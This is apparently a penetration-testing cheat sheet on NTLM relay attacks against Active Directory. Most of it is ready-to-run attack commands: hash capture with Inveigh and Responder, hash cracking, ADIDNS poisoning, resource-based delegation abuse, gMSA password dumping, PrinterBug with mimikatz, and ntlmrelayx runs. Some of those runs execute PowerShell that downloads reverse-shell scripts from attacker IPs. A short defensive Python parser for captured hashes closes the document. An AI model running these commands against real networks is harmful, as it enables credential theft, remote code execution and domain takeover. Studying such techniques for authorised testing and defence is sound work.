Relay Attacks - Active Directory Penetration Testing
2021-09-02 02:36:00 Author: www.hackingdream.net

#Relay attacks - Capturing SMB hashes

Import-Module .\Inveigh.ps1

#Start collecting hashes, we will see hashes whenever a user tries to access something non-existent via SMB
Invoke-Inveigh -ConsoleOutput Y

#cracking the hashes captured from inveigh
hashcat -m 5600 hash rockyou.txt --force -r /usr/share/hashcat/rules/d3ad0ne.rule
Relay Attack using Responder 

sudo python /usr/share/responder/Responder.py -I tun0 -A 
git clone https://github.com/dirkjanm/krbrelayx.git

#adding a DNS Record
sudo python3 dnstool.py -u 'steins.local\username' -p 'P@ssw0rd!' -a add -r 'application.steins.local' -d ATTACKER_IP SERVER_IP

#wait for the victim to access our DNS record :) you will get the user's NTLMv2 hash in Responder

#crack the hash with john
john --format=netntlmv2 hash --wordlist=wordlist.txt
Abusing ADIDNS and Relaying the Hashes

Import-Module .\Invoke-DNSUpdate.ps1
PowerShell Invoke-DNSUpdate -DNSType A -DNSName test -DNSData 192.168.21.10 -Verbose

Import-Module .\Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Tombstone -Verbose
PowerShell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose

#Capture all the users' hashes
Import-Module .\Inveigh.ps1
Invoke-Inveigh -ConsoleOutput Y -adidns combo
Invoke-Inveigh -ConsoleOutput Y -DNS Y

#Relaying the hashes for command execution
Import-Module .\InveighRelay.ps1
Invoke-InveighRelay -ConsoleOutput Y -Target 192.168.2.1 -ShowHelp N -StatusOutput N -Command "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.10:/rev.ps1')"
Resource Based Constrained Delegation on MSSQL Server 

#Add a DNS record using Invoke-DNSUpdate
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData KALI_IP -Realm Steins.local

#Login to the MSSQL Server and run xp_dirtree on the DNS name you just created
SQLCMD -S SERVER04\RE7_MS -Q "exec master.dbo.xp_dirtree '\\might@80\a'" -U Admin -P Admin

#on your Kali box, run rbcd_relay.py
sudo proxychains python rbcd_relay.py 192.168.1.2 steins.local SQL_server4$ USER
#expected output: msDS-AllowedToActOnBehalfOfOtherIdentity is added to object SQL_server4$ for object USER

#View the privileges of the user
Get-ADComputer server -Server steins.local -Properties name,msDS-AllowedToActOnBehalfOfOtherIdentity,PrincipalsAllowedToDelegateToAccount,msDS-AllowedToDelegateTo,TrustedToAuthForDelegation

#Get TGT and gain access to the server
proxychains python3 ./getST.py -dc-ip 192.168.2.1 -spn cifs/server.steins.local -impersonate sql_admin steins.local/sql_user:Password@123
export KRB5CCNAME=sql_admin.ccache; sudo proxychains psexec.py user/[email protected] -k -no-pass -dc-ip 192.168.2.10 -target-ip 192.168.2.1

#OR, from a Windows host
.\Rubeus.exe s4u /user:sql_user /rc4:58a478135a93ac3bf058a5ea0e8fdb71 /domain:steins.local /msdsspn:cifs/server.steins.local /impersonateuser:sql_admin /dc:dc.steins.local /ptt
dir \\server.steins.local\c$
psexec \\server.steins.local cmd.exe
Abusing GMSA by relaying 

Import-Module .\Invoke-DNSUpdate.ps1
Invoke-DNSUpdate -DNSType A -DNSName might -DNSData Attacker_IP -Realm steins.local

#Invoke a web request from the service that is using the gMSA
Invoke-WebRequest -uri "http://might.steins.local" -UseDefaultCredentials

#Start capturing the data using ntlmrelayx; if the service is running as administrator, SAM hashes will be dumped
sudo proxychains ntlmrelayx.py --dump-gmsa --no-dump --no-da --no-acl --no-validate-privs -debug -t ldaps://GMSA_running_machine_IP

#in case the data is shown as a password blob, you can use the DSInternals cmdlets below to convert it to an NTLM hash
(ConvertFrom-ADManagedPasswordBlob <blob>).SecureCurrentPassword | ConvertTo-NTHash

#OR, if the user can read gMSA passwords, you can use gMSADumper.py to dump the hashes
python3 gMSADumper.py -u 'USERNAME' -p 'P@SSW0RD!' -d 'steins.local' -l 'dc.steins.local'
Abusing PrinterBug

#find machines with unconstrained delegation enabled
Get-ADComputer -Filter {TrustedForDelegation -eq $True}

#Compromise and login to the machine with unconstrained delegation enabled
Invoke-Mimikatz -Command '"sekurlsa::pth /user:USERNAME /domain:steins.local /rc4:58a478135a93ac3bf058a5e354fdb71 /run:powershell.exe"'

#Run SpoolSample.exe on the unconstrained-delegation-enabled machine
SpoolSample.exe TARGET_DOMAIN_FQDN UNCONSTRAINED_DOMAIN_FQDN

#OR, from Kali, trigger the printer bug with printerbug.py and relay with ntlmrelayx
proxychains python3 printerbug.py steins.local/[email protected] KALI_IP -hashes ':31d6cfe0d16ae931b73c59d7e0c089c0'
sudo proxychains ntlmrelayx.py -t smb://192.168.1.1 -smb2support
Abusing ADIDNS to Send traffic to the target 

#Send DNS traffic to the attacker machine, so that we can relay the traffic and gain access to target machines/hashes
Import-Module ./Powermad.ps1
PowerShell New-ADIDNSNode -Node * -Data 'ATTACKER_IP' -Verbose

#assign permissions to the ADIDNS
Powershell Grant-ADIDNSPermission -Node * -Principal "Authenticated Users" -Access GenericAll -Verbose
Capturing Hashes using responder and cracking hashes 

sudo proxychains responder -I tun0 -v  

hashcat -m 5600 -a 0 hash rockyou.txt -r /usr/share/hashcat/rules/InsidePro-PasswordsPro.rule --force 
Relaying using ntlmrelayx

# -wh: Server hosting WPAD file (Attacker’s IP)
# -t: Target (You cannot relay credentials to the same device that you’re spoofing)
# -i: open an interactive shell
# -l: store the collected info in a specified directory 
# -c: execute the command 
# -e: execute a binary

ntlmrelayx dumps hashes automatically whenever the relayed account has administrator access on the target, so look out for them in the output. Impacket 0.9.23-dev has issues with ntlmrelayx; use the stable release instead.
sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support


Useful commands

sudo proxychains ntlmrelayx.py -t smb://192.168.1.2 -smb2support

sudo proxychains ntlmrelayx.py -t smb://10.10.10.10 -l loot -i -smb2support -c "powershell.exe -c iex(new-object system.net.webclient).downloadstring('http://10.10.10.102:8000/powerrev.ps1')"

#Target a specific user on a specific target
sudo proxychains ntlmrelayx.py -t smb://[email protected] -smb2support 
Using Inveigh to Capture Hashes

Import-Module .\Inveigh.ps1

#Start ADIDNS abuse
Invoke-Inveigh -ConsoleOutput Y -adidns combo  

#Use credentials for ADIDNS Abuse using Inveigh
$SecPassword = ConvertTo-SecureString 'P#SSW)RD!' -AsPlainText -Force
$Cred = New-Object System.Management.Automation.PSCredential('steins.LOCAL\USERNAME', $SecPassword)

Invoke-Inveigh -ConsoleOutput Y -adidns combo  -ADIDNSCredential $Cred -ADIDNSDomain  192.168.2.10 

Invoke-Inveigh -ConsoleOutput Y -adidns combo -ADIDNSDomain steins.local -ADIDNSDomainController 192.168.2.10


#Capturing Hashes on the target 
Invoke-Inveigh -ConsoleOutput Y -DNS Y 

#cracking the hashes captured from inveigh
hashcat -m 5600 hash ~/Downloads/Tools/rockyou.txt --force -r  /usr/share/hashcat/rules/d3ad0ne.rule


#if you are unable to crack a hash, use inveigh-relay to relay the hashes
invoke-inveighrelay -ConsoleOutput Y -Target 192.168.21.155 -ShowHelp N -StatusOutput N -Command  "powershell.exe -c whoami"
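The NetNTLMv2 lines that Inveigh and Responder write in hashcat -m 5600 format carry more than the crackable proof: the client's blob embeds the MS-NLMP AV_PAIR target information. The Python below is an added example, not code from the original post or from any tool it mentions; it parses such a line and reports the fields a defender reviewing a capture cares about, such as whether the MIC flag was set and whether a target SPN or channel bindings were present, which are the values that MIC validation, SPN checks and EPA channel binding rely on to reject relayed authentication. The sample line is constructed with fake credentials and challenges.

```python
import struct
AV_NAMES = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
            4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
            8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}

def parse_av_pairs(data: bytes) -> dict:
    """Walk the MS-NLMP AV_PAIR list (AvId u16, AvLen u16, Value) up to MsvAvEOL."""
    pairs, off = {}, 0
    while off + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, off)
        off += 4
        if av_id == 0:                      # MsvAvEOL terminates the list
            break
        value = data[off:off + av_len]
        off += av_len
        if av_id in (1, 2, 3, 4, 5, 9):     # UTF-16LE name fields
            pairs[AV_NAMES[av_id]] = value.decode("utf-16-le")
        elif av_id == 6:                    # MsvAvFlags, little-endian u32
            pairs["Flags"] = struct.unpack("<I", value)[0]
        else:
            pairs[AV_NAMES.get(av_id, f"Av{av_id}")] = value.hex()
    return pairs

def parse_5600_line(line: str) -> dict:
    """hashcat -m 5600 line: USER::DOMAIN:ServerChallenge:NTProofStr:Blob (hex)."""
    user, _, domain, server_chal, nt_proof, blob_hex = line.strip().split(":", 5)
    blob = bytes.fromhex(blob_hex)
    # Blob: RespType(1) HiRespType(1) Reserved(6) TimeStamp(8) ClientChallenge(8) Reserved3(4) AvPairs
    timestamp, client_chal = struct.unpack_from("<Q8s", blob, 8)
    info = parse_av_pairs(blob[28:])
    flags = info.get("Flags", 0)
    return {"user": user, "domain": domain, "server_challenge": server_chal,
            "nt_proof": nt_proof, "timestamp_filetime": timestamp,
            "client_challenge": client_chal.hex(), "target_info": info,
            "mic_present": bool(flags & 0x2),                   # MIC in AUTHENTICATE
            "has_channel_bindings": "ChannelBindings" in info}  # EPA channel binding

def _av(av_id: int, value: bytes) -> bytes:
    return struct.pack("<HH", av_id, len(value)) + value

def build_sample_line() -> str:
    """Constructed sample capture (fake credentials and challenges) in 5600 format."""
    u16 = lambda s: s.encode("utf-16-le")
    target_info = (_av(2, u16("STEINS")) + _av(1, u16("DC")) + _av(4, u16("steins.local"))
                   + _av(6, struct.pack("<I", 2)) + _av(9, u16("cifs/server.steins.local"))
                   + _av(0, b""))
    blob = (b"\x01\x01" + bytes(6) + struct.pack("<Q", 132_000_000_000_000_000)
            + bytes(range(8)) + bytes(4) + target_info)
    return "alice::STEINS:" + "11" * 8 + ":" + "22" * 16 + ":" + blob.hex()
```

A capture whose lines consistently lack TargetName and ChannelBindings indicates clients that are not binding their responses, which is the population that SMB signing, LDAP channel binding and EPA are meant to protect.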

Article source: https://www.hackingdream.net/2021/09/relay-attacks-active-directory-pentest.html